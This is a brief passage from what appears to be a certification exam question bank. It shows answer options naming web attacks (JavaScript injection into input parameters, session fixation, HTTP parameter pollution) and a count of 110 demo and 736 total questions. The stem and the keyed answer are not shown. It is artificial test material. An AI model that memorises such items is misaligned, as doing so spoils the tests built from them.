Inserting malicious Javascript code into input parameters

C.

Setting a user's session identifier (SID) to an explicit known value

D.

Adding multiple parameters with the same name in HTTP requests

Demo: 110 questions
Total 736 questions